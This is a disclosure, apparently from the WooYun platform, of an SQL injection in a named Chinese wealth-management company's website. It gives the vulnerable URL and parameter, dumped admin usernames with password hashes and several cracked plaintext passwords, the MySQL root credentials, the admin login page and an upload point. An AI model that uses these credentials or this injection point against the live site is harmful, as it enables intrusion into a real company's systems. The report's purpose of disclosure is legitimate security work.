当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0192647

漏洞标题:汇中财富门户网站SQL注入漏洞,可登录后台

相关厂商:汇中财富

漏洞作者: 路人甲

提交时间:2016-04-05 15:40

修复时间:2016-05-20 15:40

公开时间:2016-05-20 15:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

http://www.huizhongcf.com/about/yunyingshujutext.html?categoryid=53&id=438
参数:categoryid

huizhong.png


DBA权限

DBA.png


Database: ftphzcf
[17 tables]
+-----------------------+
| adminuser |
| logrecord |
| tb_ad |
| tb_advertisement |
| tb_advertisementstype |
| tb_area |
| tb_global |
| tb_goods |
| tb_hzlanmu |
| tb_lanmu |
| tb_leaveword |
| tb_menu |
| tb_newlist |
| tb_news |
| tb_rongyu |
| tb_tag |
| tb_yuyue |
+-----------------------+
Database: ftphzcf
Table: adminuser
[5 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| u_adddate | datetime |
| u_admin | int(11) |
| u_id | mediumint(9) |
| u_name | varchar(255) |
| u_pwd | varchar(255) |
+-----------+--------------+
明文密码:
Database: ftphzcf
Table: adminuser
[8 entries]
+---------------------+---------+------+-------------------+--------------------
-----------------------------------+
| u_adddate | u_admin | u_id | u_name | u_pwd
|
+---------------------+---------+------+-------------------+--------------------
-----------------------------------+
| 2013-01-24 18:51:17 | 1 | 2 | tlshow | 92682ec88c76a47981a
36929ea33433a082dacb4 |
| 2015-08-04 16:36:53 | 1 | 3 | huizhongcf | 0211741fb783975439e
99b767ed22335be1f9135 |
| 2015-09-16 01:38:07 | 4 | 6 | huizhongjiangtang | 7c222fb2927d828af22
f592134e8932480637c0d (12345678) |
| 2015-09-16 01:44:56 | 3 | 7 | huizhongnews | 7c222fb2927d828af22
f592134e8932480637c0d (12345678) |
| 2015-10-16 03:12:07 | 2 | 9 | huizhongzhaopin | 1f4a04e5543d8760660
bb080226040b987b88d47 (1122334455) |
| 2015-10-16 03:42:02 | 5 | 10 | huizhongchujie | 7c222fb2927d828af22
f592134e8932480637c0d (12345678) |
| 2015-10-16 03:42:30 | 6 | 11 | huizhongjiekuan | 7c222fb2927d828af22
f592134e8932480637c0d (12345678) |
| 2015-10-19 06:44:58 | 7 | 12 | huizhongyunying | 1f2a1365ff49537b1a4
1c7cc1bbafad4d166fe86 |
+---------------------+---------+------+-------------------+--------------------
-----------------------------------+
数据库user
Database: mysql
Table: user
[6 entries]
+---------+--------------+--------------------------------------------------+
| user | host | password |
+---------+--------------+--------------------------------------------------+
| root | localhost | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B (root) |
| root | guanwang-new | <blank> |
| root | 127.0.0.1 | <blank> |
| root | ::1 | <blank> |
| <blank> | localhost | <blank> |
| <blank> | guanwang-new | <blank> |
+---------+--------------+--------------------------------------------------+

漏洞证明:

http://www.huizhongcf.com/winadmin/login.php
使用上面注入出的管理员账号密码登录:

admin.png


123.png


有上传点

shangchuan.png


修复方案:

过滤特殊字符,设置密码复杂度策略,招个安全专员。。
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2016-04-25 09:50

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)